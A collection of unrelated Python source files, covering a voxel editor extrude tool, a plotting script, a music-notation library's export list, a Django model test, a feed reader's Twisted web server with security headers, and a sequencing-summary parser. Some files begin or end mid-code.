sx = self.api.mainwindow.width() / data.voxels.width
sy = self.api.mainwindow.height() / data.voxels.height
dx = int(round(dx / float(sx)))
dy = int(round(dy / float(sy)))
if dx == 0 and dy == 0:
return
# Work out translation for x,y
ax, ay = self.api.mainwindow.display.view_axis()
tx = 0
ty = 0
tz = 0
tdx = 0
tdy = 0
tdz = 0
if ax == self.api.mainwindow.display.X_AXIS:
tdx = dx
if dx > 0:
tx = 1
elif dx < 0:
tx = -1
elif ax == self.api.mainwindow.display.Y_AXIS:
tdy = dx
if dx > 0:
ty = 1
elif dx < 0:
ty = -1
elif ax == self.api.mainwindow.display.Z_AXIS:
tdz = dx
if dx > 0:
tz = 1
elif dx < 0:
tz = -1
if ay == self.api.mainwindow.display.X_AXIS:
tdx = dy
if dy > 0:
tx = 1
elif dy < 0:
tx = -1
elif ay == self.api.mainwindow.display.Y_AXIS:
tdy = dy
if dy > 0:
ty = -1
elif dy < 0:
ty = 1
elif ay == self.api.mainwindow.display.Z_AXIS:
tdz = dy
if dy > 0:
tz = 1
elif dy < 0:
tz = -1
if self.fixeddirection:
if self.xdir:
if tx != 0:
self._mouse = (data.mouse_x, data.mouse_y)
self.pastoffset += tx
self.drawstamp(data, self.pastoffset, 0, 0)
elif self.ydir:
if ty != 0:
self._mouse = (data.mouse_x, data.mouse_y)
self.pastoffset += ty
self.drawstamp(data, 0, self.pastoffset, 0)
elif self.zdir:
if tz != 0:
self._mouse = (data.mouse_x, data.mouse_y)
self.pastoffset += tz
self.drawstamp(data, 0, 0, self.pastoffset)
else:
if tx != 0 and self.xdir and (not self.ydir or (abs(tdx) > abs(tdy) and abs(tdx) > abs(tdz))):
self._mouse = (data.mouse_x, data.mouse_y)
self.ydir = False
self.zdir = False
self.pastoffset += tx
self.drawstamp(data, self.pastoffset, 0, 0)
elif ty != 0 and self.ydir and (not self.zdir or abs(tdy) > abs(tdz)):
self._mouse = (data.mouse_x, data.mouse_y)
self.xdir = False
self.zdir = False
self.pastoffset += ty
self.drawstamp(data, 0, self.pastoffset, 0)
elif tz != 0 and self.zdir:
self._mouse = (data.mouse_x, data.mouse_y)
self.xdir = False
self.ydir = False
self.pastoffset += tz
self.drawstamp(data, 0, 0, self.pastoffset)
def on_drag_end(self, data):
data.voxels.clear_selection()
dx = self.pastoffset if self.xdir else 0
dy = self.pastoffset if self.ydir else 0
dz = self.pastoffset if self.zdir else 0
for x, y, z, col in self._stamp:
data.voxels.select(x + dx, y + dy, z + dz)
register_plugin(ExtrudeTool, "Extrude Tool", "1.0")
|
import matplotlib.pyplot as plt
import scipy as sp
arq = 'CurvaGiro/pos.dat'
v = [-10,1000, 0, 1000]
xl = r'y metros'
yl = r'x metros'
x = sp.genfromtxt('CurvaGiro/pos.dat')
a = plt.plot(x[:,2], x[:,1], 'k-')
plt.grid(True, 'both', color = '0.8', linestyle = '--', linewidth = 1)
plt.axis(v)
plt.xlabel(xl)
plt.ylabel(yl)
plt.show(a)
|
from quicktions import Fraction
from . import (
_update,
deprecated,
enumerate,
format,
get,
illustrators,
io,
iterate,
iterpitches,
lyconst,
lyenv,
makers,
mutate,
persist,
string,
wf,
)
from ._version import __version__, __version_info__
from .bind import Wrapper, annotate, attach, detach
from .bundle import LilyPondFormatBundle, SlotContributions
from .configuration import (
Configuration,
list_all_classes,
list_all_functions,
yield_all_modules,
)
from .contextmanagers import (
ContextManager,
FilesystemState,
ForbidUpdate,
NullContextManager,
ProgressIndicator,
RedirectedStreams,
TemporaryDirectory,
TemporaryDirectoryChange,
Timer,
)
from .cyclictuple import CyclicTuple
from .duration import Duration, Multiplier, NonreducedFraction, Offset
from .dynamic import Dynamic
from .enums import (
Center,
Comparison,
Down,
Exact,
HorizontalAlignment,
Left,
Less,
Middle,
More,
Right,
Up,
VerticalAlignment,
)
from .exceptions import (
AssignabilityError,
ImpreciseMetronomeMarkError,
LilyPondParserError,
MissingMetronomeMarkError,
ParentageError,
PersistentIndicatorError,
SchemeParserFinishedError,
UnboundedTimeIntervalError,
WellformednessError,
)
from .format import lilypond
from .get import Lineage
from .illustrators import illustrate
from .indicators import (
Arpeggio,
Articulation,
BarLine,
BeamCount,
BendAfter,
BreathMark,
Clef,
ColorFingering,
Fermata,
Glissando,
KeyCluster,
KeySignature,
LaissezVibrer,
MarginMarkup,
MetronomeMark,
Mode,
Ottava,
RehearsalMark,
Repeat,
RepeatTie,
StaffChange,
StaffPosition,
StartBeam,
StartGroup,
StartHairpin,
StartMarkup,
StartPhrasingSlur,
StartPianoPedal,
StartSlur,
StartTextSpan,
StartTrillSpan,
StemTremolo,
StopBeam,
StopGroup,
StopHairpin,
StopPhrasingSlur,
StopPianoPedal,
StopSlur,
StopTextSpan,
StopTrillSpan,
Tie,
TimeSignature,
)
from .instruments import (
Accordion,
AltoFlute,
AltoSaxophone,
AltoTrombone,
AltoVoice,
BaritoneSaxophone,
BaritoneVoice,
BassClarinet,
BassFlute,
BassSaxophone,
BassTrombone,
BassVoice,
Bassoon,
Cello,
ClarinetInA,
ClarinetInBFlat,
ClarinetInEFlat,
Contrabass,
ContrabassClarinet,
ContrabassFlute,
ContrabassSaxophone,
Contrabassoon,
EnglishHorn,
Flute,
FrenchHorn,
Glockenspiel,
Guitar,
Harp,
Harpsichord,
Instrument,
Marimba,
MezzoSopranoVoice,
Oboe,
Percussion,
Piano,
Piccolo,
SopraninoSaxophone,
SopranoSaxophone,
SopranoVoice,
StringNumber,
TenorSaxophone,
TenorTrombone,
TenorVoice,
Trumpet,
Tuba,
Tuning,
Vibraphone,
Viola,
Violin,
Xylophone,
)
from .io import graph, show
from .label import ColorMap
from .lilypondfile import Block, LilyPondFile
from .lyproxy import (
LilyPondContext,
LilyPondEngraver,
LilyPondGrob,
LilyPondGrobInterface,
)
from .makers import LeafMaker, NoteMaker
from .markups import Markup
from .math import Infinity, NegativeInfinity
from .meter import Meter, MeterList, MetricAccentKernel
from .metricmodulation import MetricModulation
from .obgc import OnBeatGraceContainer, on_beat_grace_container
from .overrides import (
IndexedTweakManager,
IndexedTweakManagers,
Interface,
LilyPondLiteral,
LilyPondOverride,
LilyPondSetting,
OverrideInterface,
SettingInterface,
TweakInterface,
override,
setting,
tweak,
)
from .parentage import Parentage
from .parsers import parser
from .parsers.base import Parser
from .parsers.parse import parse
from .pattern import Pattern, PatternTuple
from .pcollections import (
IntervalClassSegment,
IntervalClassSet,
IntervalSegment,
IntervalSet,
PitchClassSegment,
PitchClassSet,
PitchRange,
PitchSegment,
PitchSet,
Segment,
Set,
TwelveToneRow,
)
from .pitch import (
Accidental,
Interval,
IntervalClass,
NamedInterval,
NamedIntervalClass,
NamedInversionEquivalentIntervalClass,
NamedPitch,
NamedPitchClass,
NumberedInterval,
NumberedIntervalClass,
NumberedInversionEquivalentIntervalClass,
NumberedPitch,
NumberedPitchClass,
Octave,
Pitch,
PitchClass,
PitchTyping,
)
from .ratio import NonreducedRatio, Ratio
from .score import (
AfterGraceContainer,
BeforeGraceContainer,
Chord,
Cluster,
Component,
Container,
Context,
DrumNoteHead,
Leaf,
MultimeasureRest,
Note,
NoteHead,
NoteHeadList,
Rest,
Score,
Skip,
Staff,
StaffGroup,
TremoloContainer,
Tuplet,
Voice,
)
from .select import LogicalTie, Selection
from .setclass import SetClass
from .spanners import (
beam,
glissando,
hairpin,
horizontal_bracket,
ottava,
phrasing_slur,
piano_pedal,
slur,
text_spanner,
tie,
trill_spanner,
)
from .tag import Line, Tag, activate, deactivate
from .timespan import OffsetCounter, Timespan, TimespanList
from .typedcollections import TypedCollection, TypedFrozenset, TypedList, TypedTuple
from .typings import (
DurationSequenceTyping,
DurationTyping,
IntegerPair,
IntegerSequence,
Number,
NumberPair,
PatternTyping,
Prototype,
RatioSequenceTyping,
RatioTyping,
Strings,
)
from .verticalmoment import (
VerticalMoment,
iterate_leaf_pairs,
iterate_pitch_pairs,
iterate_vertical_moments,
)
index = Pattern.index
index_all = Pattern.index_all
index_first = Pattern.index_first
index_last = Pattern.index_last
__all__ = [
"Accidental",
"Accordion",
"AfterGraceContainer",
"AltoFlute",
"AltoSaxophone",
"AltoTrombone",
"AltoVoice",
"Arpeggio",
"Articulation",
"AssignabilityError",
"BarLine",
"BaritoneSaxophone",
"BaritoneVoice",
"BassClarinet",
"BassFlute",
"BassSaxophone",
"BassTrombone",
"BassVoice",
"Bassoon",
"BeamCount",
"BeforeGraceContainer",
"BendAfter",
"Block",
"BreathMark",
"Cello",
"Center",
"Chord",
"ClarinetInA",
"ClarinetInBFlat",
"ClarinetInEFlat",
"Clef",
"Cluster",
"ColorFingering",
"ColorMap",
"Comparison",
"Component",
"Configuration",
"Container",
"Context",
"ContextManager",
"Contrabass",
"ContrabassClarinet",
"ContrabassFlute",
"ContrabassSaxophone",
"Contrabassoon",
"CyclicTuple",
"Down",
"DrumNoteHead",
"Duration",
"DurationSequenceTyping",
"DurationTyping",
"Dynamic",
"EnglishHorn",
"Exact",
"Expression",
"Fermata",
"FilesystemState",
"Flute",
"ForbidUpdate",
"Fraction",
"FrenchHorn",
"Glissando",
"Glockenspiel",
"Guitar",
"Harp",
"Harpsichord",
"HorizontalAlignment",
"ImpreciseMetronomeMarkError",
"IndexedTweakManager",
"IndexedTweakManagers",
"Infinity",
"Instrument",
"IntegerPair",
"IntegerSequence",
"Interface",
"Interval",
"IntervalClass",
"IntervalClassSegment",
"IntervalClassSet",
"IntervalSegment",
"IntervalSet",
"KeyCluster",
"KeySignature",
"LaissezVibrer",
"Leaf",
"LeafMaker",
"Left",
"Less",
"LilyPondContext",
"LilyPondEngraver",
"LilyPondFile",
"LilyPondFormatBundle",
"LilyPondGrob",
"LilyPondGrobInterface",
"LilyPondLiteral",
"LilyPondOverride",
"LilyPondParserError",
"LilyPondSetting",
"Line",
"Lineage",
"LogicalTie",
"MarginMarkup",
"Marimba",
"Markup",
"Meter",
"MeterList",
"MetricAccentKernel",
"MetricModulation",
"MetronomeMark",
"MezzoSopranoVoice",
"Middle",
"MissingMetronomeMarkError",
"Mode",
"More",
"MultimeasureRest",
"Multiplier",
"NamedInterval",
"NamedIntervalClass",
"NamedInversionEquivalentIntervalClass",
"NamedPitch",
"NamedPitchClass",
"NegativeInfinity",
"NonreducedFraction",
"NonreducedRatio",
"Note",
"NoteHead",
"NoteHeadList",
"NoteMaker",
"NullContextManager",
"Number",
"NumberPair",
"NumberedInterval",
"NumberedIntervalClass",
"NumberedInversionEquivalentIntervalClass",
"NumberedPitch",
"NumberedPitchClass",
"Oboe",
"Octave",
"Offset",
"OffsetCounter",
"OnBeatGraceContainer",
"Ottava",
"OverrideInterface",
"Parentage",
"ParentageError",
"Parser",
"Pattern",
"PatternTuple",
"PatternTyping",
"Percussion",
"PersistentIndicatorError",
"Piano",
"Piccolo",
"Pitch",
"PitchClass",
"PitchClassSegment",
"PitchClassSet",
"PitchRange",
"PitchSegment",
"PitchSet",
"PitchTyping",
"ProgressIndicator",
"Prototype",
"Ratio",
"RatioSequenceTyping",
"RatioTyping",
"RedirectedStreams",
"RehearsalMark",
"Repeat",
"RepeatTie",
"Rest",
"Right",
"SchemeParserFinishedError",
"Score",
"Segment",
"Selection",
"Set",
"SetClass",
"SettingInterface",
"Skip",
"SlotContributions",
"SopraninoSaxophone",
"SopranoSaxophone",
"SopranoVoice",
"Staff",
"StaffChange",
"StaffGroup",
"StaffPosition",
"StartBeam",
"StartGroup",
"StartHairpin",
"StartMarkup",
"StartPhrasingSlur",
"StartPianoPedal",
"StartSlur",
"StartTextSpan",
"StartTrillSpan",
"StemTremolo",
"StopBeam",
"StopGroup",
"StopHairpin",
"StopPhrasingSlur",
"StopPianoPedal",
"StopSlur",
"StopTextSpan",
"StopTrillSpan",
"StringNumber",
"Strings",
"Tag",
"TemporaryDirectory",
"TemporaryDirectoryChange",
"TenorSaxophone",
"TenorTrombone",
"TenorVoice",
"Tie",
"TimeSignature",
"Timer",
"Timespan",
"TimespanList",
"TremoloContainer",
"Trumpet",
"Tuba",
"Tuning",
"Tuplet",
"TweakInterface",
"TwelveToneRow",
"TypedCollection",
"TypedFrozenset",
"TypedList",
"TypedTuple",
"UnboundedTimeIntervalError",
"Up",
"VerticalAlignment",
"VerticalMoment",
"Vibraphone",
"Viola",
"Violin",
"Voice",
"WellformednessError",
"Wrapper",
"Xylophone",
"__version__",
"__version_info__",
"_update",
"activate",
"annotate",
"attach",
"beam",
"deactivate",
"deprecated",
"detach",
"enumerate",
"format",
"glissando",
"graph",
"hairpin",
"horizontal_bracket",
"illustrate",
"illustrators",
"index",
"index_all",
"index_first",
"index_last",
"get",
"io",
"iterate",
"iterate_leaf_pairs",
"iterate_pitch_pairs",
"iterate_vertical_moments",
"iterpitches",
"label",
"list_all_classes",
"list_all_functions",
"lilypond",
"lyconst",
"lyenv",
"makers",
"mutate",
"on_beat_grace_container",
"ottava",
"override",
"parse",
"parser",
"persist",
"phrasing_slur",
"piano_pedal",
"select",
"setting",
"show",
"slur",
"string",
"text_spanner",
"tie",
"trill_spanner",
"tweak",
"wf",
"yield_all_modules",
]
|
"""Address model tests."""
from core.models import Address
from core.factory import AddressFactory
from tests.utils import ModelTestCase
class AddressTest(ModelTestCase):
"""Test the Address model."""
model = Address
field_tests = {
'line1': {
'verbose_name': 'ligne 1',
'blank': False,
'max_length': 300,
},
'line2': {
'verbose_name': 'ligne 2',
'max_length': 300,
'blank': True,
'default': '',
},
'post_code': {
'verbose_name': 'code postal',
'blank': False,
'max_length': 20,
},
'city': {
'verbose_name': 'ville',
'blank': False,
'max_length': 100,
},
'country': {
'verbose_name': 'pays',
'blank': False,
'default': 'FR',
},
}
model_tests = {
'verbose_name': 'adresse',
}
@classmethod
def setUpTestData(cls):
cls.obj = AddressFactory.create(
line1='3 Rue Joliot Curie',
post_code='91190',
city='Gif-sur-Yvette',
)
def test_str(self):
expected = '3 Rue Joliot Curie, 91190 Gif-sur-Yvette, France'
self.assertEqual(expected, str(self.obj))
|
"""
Yarrharr production server via Twisted Web
"""
import io
import json
import logging
import os
import re
import sys
from base64 import b64encode
import attr
from django.conf import settings
from django.dispatch import receiver
from twisted.internet import defer
from twisted.internet.endpoints import serverFromString
from twisted.logger import (
FileLogObserver,
FilteringLogObserver,
ILogFilterPredicate,
Logger,
LogLevel,
PredicateResult,
formatEvent,
globalLogBeginner,
globalLogPublisher,
)
from twisted.python.filepath import FilePath
from twisted.web.resource import ErrorPage, NoResource, Resource
from twisted.web.server import Site
from twisted.web.static import File
from twisted.web.wsgi import WSGIResource
from zope.interface import implementer
from . import __version__
from .signals import schedule_changed
from .wsgi import application
log = Logger()
@attr.s
class CSPReport(object):
url = attr.ib()
referrer = attr.ib()
resource = attr.ib()
violatedDirective = attr.ib()
effectiveDirective = attr.ib()
source = attr.ib()
sample = attr.ib()
status = attr.ib()
policy = attr.ib()
disposition = attr.ib()
def __str__(self):
bits = []
for a in attr.fields(self.__class__):
value = getattr(self, a.name)
if value is None:
continue
bits.append("{}={!r}".format(a.name, value))
return "\n".join(bits)
@classmethod
def fromJSON(cls, data):
"""
Construct a :class:`CSPReport` from the serialization of a violation
per CSP Level 3 §5.3.
"""
if {"source-file", "line-number", "column-number"} <= data.keys():
source = "{source-file} {line-number}:{column-number}".format_map(data)
elif {"source-file", "line-number"} <= data.keys():
source = "{source-file} {line-number}".format_map(data)
else:
source = data.get("source-file")
return cls(
url=data["document-uri"],
referrer=data["referrer"] or None, # Always seems to be an empty string.
resource=data["blocked-uri"],
violatedDirective=data.get("violated-directive"),
effectiveDirective=data.get("effective-directive"),
policy=data["original-policy"],
disposition=data.get("disposition"),
status=data.get("status-code"),
sample=data.get("script-sample") or None,
source=source,
)
class CSPReportLogger(Resource):
isLeaf = True
_log = Logger()
def render(self, request):
if request.method != b"POST":
request.setResponseCode(405)
request.setHeader("Allow", "POST")
return b"HTTP 405: Method Not Allowed\n"
if request.requestHeaders.getRawHeaders("Content-Type") != ["application/csp-report"]:
request.setResponseCode(415)
return b"HTTP 415: Only application/csp-report requests are accepted\n"
# Process the JSON text produced per
# https://w3c.github.io/webappsec-csp/#deprecated-serialize-violation
report = CSPReport.fromJSON(json.load(io.TextIOWrapper(request.content, encoding="utf-8"))["csp-report"])
if report.sample and report.sample.startswith(";(function installGlobalHook(window) {"):
# This seems to be a misbehavior in some Firefox extension.
# I cannot reproduce it with a clean profile.
return b""
if report.sample and report.sample == "call to eval() or related function blocked by CSP":
# This is caused by Tridactyl due to a Firefox issue. It's quite
# chatty so we'll disable for now, even though the message is
# generated by the browser and might indicate a script injection.
# See <https://github.com/cmcaine/tridactyl/issues/109> and
# <https://bugzilla.mozilla.org/show_bug.cgi?id=1267027>.
return b""
self._log.debug(
"Content Security Policy violation reported by {userAgent!r}:\n{report}",
userAgent=", ".join(request.requestHeaders.getRawHeaders("User-Agent", [])),
report=report,
)
return b"" # Browser ignores the response.
class FallbackResource(Resource):
"""
Resource which falls back to an alternative resource tree if it doesn't
have a matching child resource.
"""
def __init__(self, fallback):
Resource.__init__(self)
self.fallback = fallback
def render(self, request):
"""
Render this path with the fallback resource.
"""
return self.fallback.render(request)
def getChild(self, path, request):
"""
Dispatch unhandled requests to the fallback resource.
"""
# Mutate the request path such that it's like FallbackResource didn't handle
# the request at all. This is a bit of a nasty hack, since we're
# relying on the t.w.server implementation's behavior to not break when
# we do this. A better way would be to create a wrapper for the request object
request.postpath.insert(0, request.prepath.pop())
return self.fallback
class Static(Resource):
"""
Serve up Yarrharr's static assets directory. The files in this directory
have names like::
In development, the files are served uncompressed and named like so::
main-afffb00fd22ca3ce0250.js
The second dot-delimited section is a hash of the file's contents or source
material. As the filename changes each time the content does, these files
are served with a long max-age and the ``immutable`` flag in the
`Cache-Control`_ header.
In production, each file has two pre-compressed variants: one with
a ``.gz`` extension, and one with a ``.br`` extension. For example::
main-afffb00fd22ca3ce0250.js
main-afffb00fd22ca3ce0250.js.br
main-afffb00fd22ca3ce0250.js.gz
The actual serving of the files is done by `twisted.web.static.File`, which
is fancy and supports range requests, conditional gets, etc.
.. note::
Several features used here are only available to HTTPS origins.
Cache-Control: immutable and Brotli compression both are in Firefox.
.. _cache-control: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control
"""
_dir = FilePath(settings.STATIC_ROOT)
_validName = re.compile(rb"^[a-zA-Z0-9]+-[a-zA-Z0-9]+(\.[a-z]+)+$")
# NOTE: RFC 7231 § 5.3.4 is not completely clear about whether
# content-coding tokens are case-sensitive or not. The "identity" token
# appears in EBNF and is therefore definitely case-insensitive, but the
# other tokens only appear in IANA registry tables in lowercase form. In
# contrast, the transfer-coding possibilities are clearly defined in EBNF
# so are definitely case-insensitive. For content-coding every implementer
# seems to agree on lowercase, so I'm not going to worry about it.
_brToken = re.compile(rb"(:?^|[\s,])br(:?$|[\s,;])")
_gzToken = re.compile(rb"(:?^|[\s,])(:?x-)?gzip(:?$|[\s,;])")
_contentTypes = {
b".js": "application/javascript",
b".css": "text/css",
b".map": "application/octet-stream",
b".ico": "image/x-icon",
b".svg": "image/svg+xml",
b".png": "image/png",
}
def _file(self, path, type, encoding=None):
"""
Construct a `twisted.web.static.File` customized to serve Yarrharr
static assets.
:param path: `twisted.internet.filepath.FilePath` instance
:returns: `twisted.web.resource.IResource`
"""
f = File(path.path)
f.type = type
f.encoding = encoding
return f
def getChild(self, path, request):
"""
Serve a file for the given path.
The Content-Type header is set based on the file extension.
A limited form of content negotiation is done based on the
Accept-Encoding header and the files on disk. Apart from the default of
``identity``, two encodings are supported:
* ``br``, which selects any Brotli-compressed ``.br`` variant of
the file.
* ``gzip``, which selects any gzip-compressed ``.br`` variant of the
file. ``x-gzip`` is also supported.
qvalues are ignored as browsers don't use them. This may produce an
incorrect response if a variant is disabled like ``identity;q=0``.
"""
if not self._validName.match(path):
return NoResource("Not found.")
ext = path[path.rindex(b".") :]
try:
type = self._contentTypes[ext]
except KeyError:
return NoResource("Unknown type.")
acceptEncoding = request.getHeader(b"accept-encoding") or b"*"
file = None
if self._brToken.search(acceptEncoding):
br = self._dir.child(path + b".br")
if br.isfile():
file = self._file(br, type, "br")
if file is None and self._gzToken.search(acceptEncoding):
gz = self._dir.child(path + b".gz")
if gz.isfile():
file = self._file(gz, type, "gzip")
if file is None:
file = self._file(self._dir.child(path), type)
request.setHeader(b"Vary", b"accept-encoding")
request.setHeader(b"Cache-Control", b"public, max-age=31536000, immutable")
return file
class Root(FallbackResource):
"""
Root of the Yarrharr URL hierarchy.
"""
def __init__(self, reactor, threadpool):
wsgi = WSGIResource(reactor, threadpool, application)
FallbackResource.__init__(self, wsgi)
self.putChild(b"csp-report", CSPReportLogger())
self.putChild(b"static", Static())
# Handle requests for /favicon.ico and paths hit by script kiddies at
# the Twisted level so that they don't make it down to Django, which
# logs 404s as errors:
a404 = ErrorPage(404, "Not Found", "")
for path in (b"favicon.ico", b"index.php", b"wp-login.php"):
self.putChild(path, a404)
def getChildWithDefault(self, name, request):
# Disable the Referer header in some browsers. This is complemented by
# the injection of rel="noopener noreferrer" on all links by the HTML
# sanitizer.
request.setHeader(b"Referrer-Policy", b"same-origin")
request.setHeader(b"X-Content-Type-Options", b"nosniff")
request.setHeader(b"Cross-Origin-Opener-Policy", b"same-origin")
script_nonce = b64encode(os.urandom(32))
request.requestHeaders.setRawHeaders(b"Yarrharr-Script-Nonce", [script_nonce])
request.setHeader(
b"Content-Security-Policy",
(
# b"default-src 'none'; "
b"img-src *; "
b"script-src 'self' 'nonce-%s'; "
b"style-src 'self'; "
b"frame-ancestors 'none'; "
b"form-action 'self'; "
b"report-uri /csp-report"
)
% (script_nonce,),
)
return super().getChildWithDefault(name, request)
def updateFeeds(reactor, max_fetch=5):
"""
Poll any feeds due for a check.
"""
from .fetch import poll
def _failed(reason):
"""
Log unexpected errors and schedule a retry in one second.
"""
log.failure("Unexpected failure polling feeds", failure=reason)
return 1.0 # seconds until next poll
d = poll(reactor, max_fetch)
# Last gasp error handler to avoid terminating the LoopingCall.
d.addErrback(_failed)
return d
_txLevelToPriority = {
LogLevel.debug: "<7>",
LogLevel.info: "<6>",
LogLevel.warn: "<4>",
LogLevel.error: "<3>",
LogLevel.critical: "<2>",
}
def formatForSystemd(event):
# Events generated by twisted.python.log have a "system", while ones
# generated with twisted.logger have a "namespace" with similar
# meaning.
#
s = "[{}] ".format(event.get("log_system") or event.get("log_namespace") or "-")
s += formatEvent(event)
if not s:
return None
if "log_failure" in event:
try:
s += "\n" + event["log_failure"].getTraceback().rstrip("\n")
except: # noqa
pass
prefix = _txLevelToPriority.get(event.get("log_level")) or "<6>"
return prefix + s.replace("\n", "\n" + prefix + " ") + "\n"
@implementer(ILogFilterPredicate)
def dropUnhandledHTTP2Shutdown(event):
"""
Suppress the log messages which result from an unhandled error in HTTP/2
connection shutdown. See #282 and Twisted #9462.
This log message is relayed from the :mod:`twisted.python.log` so the
fields are a little odd:
* ``'log_namespace'`` is ``'log_legacy'``, and there is a ``'system'``
field with a value of ``'-'``.
* ``'log_text'`` contains the actual log text, including a pre-formatted
traceback.
* ``'failure'`` used instead of ``'log_failure'``.
"""
if event.get("log_namespace") != "log_legacy":
return PredicateResult.maybe
if event.get("log_level") != LogLevel.critical:
return PredicateResult.maybe
if "failure" not in event or not event["failure"].check(AttributeError):
return PredicateResult.maybe
if event["log_text"].startswith("Unhandled Error") and "no attribute 'shutdown'" in event["log_text"]:
return PredicateResult.no
return PredicateResult.maybe
class TwistedLoggerLogHandler(logging.Handler):
publisher = globalLogPublisher
def _mapLevel(self, levelno):
"""
Convert a stdlib logging level into a Twisted :class:`LogLevel`.
"""
if levelno <= logging.DEBUG:
return LogLevel.debug
elif levelno <= logging.INFO:
return LogLevel.info
elif levelno <= logging.WARNING:
return LogLevel.warn
elif levelno <= logging.ERROR:
return LogLevel.error
return LogLevel.critical
def emit(self, record):
self.publisher(
{
"log_level": self._mapLevel(record.levelno),
"log_namespace": record.name,
"log_format": "{msg}",
"msg": self.format(record),
}
)
class AdaptiveLoopingCall(object):
"""
:class:`AdaptiveLoopingCall` invokes a function periodically. Each time it
is called it returns the time to wait until the next invocation.
:ivar _clock: :class:`IReactorTime` implementer
:ivar _f: The function to call.
:ivar _deferred: Deferred returned by :meth:`.start()`.
:ivar _call: `IDelayedCall` when waiting for the next poll period.
Otherwise `None`.
:ivar bool _poked: `True` when the function should be immediately invoked
again after it completes.
:ivar bool _stopped: `True` once `stop()` has been called.
"""
_deferred = None
_call = None
_poked = False
_stopped = False
def __init__(self, clock, f):
"""
:param clock: :class:`IReactorTime` provider to use when scheduling
calls.
:param f: The function to call when the loop is started. It must return
the number of seconds to wait before calling it again, or
a deferred for the same.
"""
self._clock = clock
self._f = f
def start(self):
"""
Call the function immediately, and schedule future calls according to
its result.
:returns:
:class:`Deferred` which will succeed when :meth:`stop()` is called
and the loop cleanly exits, or fail when the function produces
a failure.
"""
assert self._deferred is None
assert self._call is None
assert not self._stopped
self._deferred = d = defer.Deferred()
self._callIt()
return d
def stop(self):
self._stopped = True
if self._call:
self._call.cancel()
self._deferred.callback(self)
def poke(self):
"""
Run the function as soon as possible: either immediately or once it has
finished any current execution. This is a no-op if the service has been
stopped. Pokes coalesce if received while the function is executing.
"""
if self._stopped or self._poked:
return
if self._call:
self._call.cancel()
self._callIt()
else:
self._poked = True
def _callIt(self):
self._call = None
d = defer.maybeDeferred(self._f)
d.addCallback(self._schedule)
d.addErrback(self._failLoop)
def _schedule(self, seconds):
"""
Schedule the next call.
"""
assert isinstance(seconds, (int, float))
if self._stopped:
d, self._deferred = self._deferred, None
d.callback(self)
elif self._poked:
self._poked = False
self._callIt()
else:
self._call = self._clock.callLater(seconds, self._callIt)
def _failLoop(self, failure):
"""
Terminate the loop due to an unhandled failure.
"""
d, self._deferred = self._deferred, None
d.errback(failure)
def run():
from twisted.internet import reactor
root = logging.getLogger()
logging.getLogger("django").setLevel(logging.INFO)
logging.raiseExceptions = settings.DEBUG
logging._srcfile = None # Disable expensive collection of location information.
root.setLevel(logging.DEBUG if settings.DEBUG else logging.INFO)
root.addHandler(TwistedLoggerLogHandler())
observer = FilteringLogObserver(
FileLogObserver(sys.stdout, formatForSystemd),
[dropUnhandledHTTP2Shutdown],
)
globalLogBeginner.beginLoggingTo([observer], redirectStandardIO=False)
log.info("Yarrharr {version} starting", version=__version__)
factory = Site(Root(reactor, reactor.getThreadPool()), logPath=None)
endpoint = serverFromString(reactor, settings.SERVER_ENDPOINT)
reactor.addSystemEventTrigger("before", "startup", endpoint.listen, factory)
updateLoop = AdaptiveLoopingCall(reactor, lambda: updateFeeds(reactor))
loopEndD = updateLoop.start()
loopEndD.addErrback(lambda f: log.failure("Polling loop broke", f))
@receiver(schedule_changed)
def threadPollNow(sender, **kwargs):
"""
When the `schedule_changed` signal is sent poke the polling loop. If it
is sleeping this will cause it to poll immediately. Otherwise this will
cause it to run the poll function immediately once it returns (running
it again protects against races).
"""
log.debug("Immediate poll triggered by {sender}", sender=sender)
reactor.callFromThread(updateLoop.poke)
def stopUpdateLoop():
updateLoop.stop()
return loopEndD
reactor.addSystemEventTrigger("before", "shutdown", stopUpdateLoop)
reactor.run()
|
import logging
from functools import reduce
import nanoget.utils as ut
import pandas as pd
import sys
import pysam
import re
from Bio import SeqIO
import concurrent.futures as cfutures
from itertools import repeat
def process_summary(summaryfile, **kwargs):
"""Extracting information from an albacore summary file.
Only reads which have a >0 length are returned.
The fields below may or may not exist, depending on the type of sequencing performed.
Fields 1-14 are for 1D sequencing.
Fields 1-23 for 2D sequencing.
Fields 24-27, 2-5, 22-23 for 1D^2 (1D2) sequencing
Fields 28-38 for barcoded workflows
1 filename
2 read_id
3 run_id
4 channel
5 start_time
6 duration
7 num_events
8 template_start
9 num_events_template
10 template_duration
11 num_called_template
12 sequence_length_template
13 mean_qscore_template
14 strand_score_template
15 complement_start
16 num_events_complement
17 complement_duration
18 num_called_complement
19 sequence_length_complement
20 mean_qscore_complement
21 strand_score_complement
22 sequence_length_2d
23 mean_qscore_2d
24 filename1
25 filename2
26 read_id1
27 read_id2
28 barcode_arrangement
29 barcode_score
30 barcode_full_arrangement
31 front_score
32 rear_score
33 front_begin_index
34 front_foundseq_length
35 rear_end_index
36 rear_foundseq_length
37 kit
38 variant
"""
logging.info("Nanoget: Collecting metrics from summary file {} for {} sequencing".format(
summaryfile, kwargs["readtype"]))
ut.check_existance(summaryfile)
if kwargs["readtype"] == "1D":
cols = ["channel", "start_time", "duration",
"sequence_length_template", "mean_qscore_template"]
elif kwargs["readtype"] in ["2D", "1D2"]:
cols = ["channel", "start_time", "duration", "sequence_length_2d", "mean_qscore_2d"]
if kwargs["barcoded"]:
cols.append("barcode_arrangement")
logging.info("Nanoget: Extracting metrics per barcode.")
try:
datadf = pd.read_csv(
filepath_or_buffer=summaryfile,
sep="\t",
usecols=cols,
)
except ValueError:
logging.error("Nanoget: did not find expected columns in summary file {}:\n {}".format(
summaryfile, ', '.join(cols)))
sys.exit("ERROR: expected columns in summary file {} not found:\n {}".format(
summaryfile, ', '.join(cols)))
if kwargs["barcoded"]:
datadf.columns = ["channelIDs", "time", "duration", "lengths", "quals", "barcode"]
else:
datadf.columns = ["channelIDs", "time", "duration", "lengths", "quals"]
logging.info("Nanoget: Finished collecting statistics from summary file {}".format(summaryfile))
return ut.reduce_memory_usage(datadf.loc[datadf["lengths"] != 0].copy())
def check_bam(bam, samtype="bam"):
"""Check if bam file is valid.
Bam file should:
- exists
- has an index (create if necessary)
- is sorted by coordinate
- has at least one mapped read
"""
ut.check_existance(bam)
samfile = pysam.AlignmentFile(bam, "rb")
if not samfile.has_index():
pysam.index(bam)
samfile = pysam.AlignmentFile(bam, "rb") # Need to reload the samfile after creating index
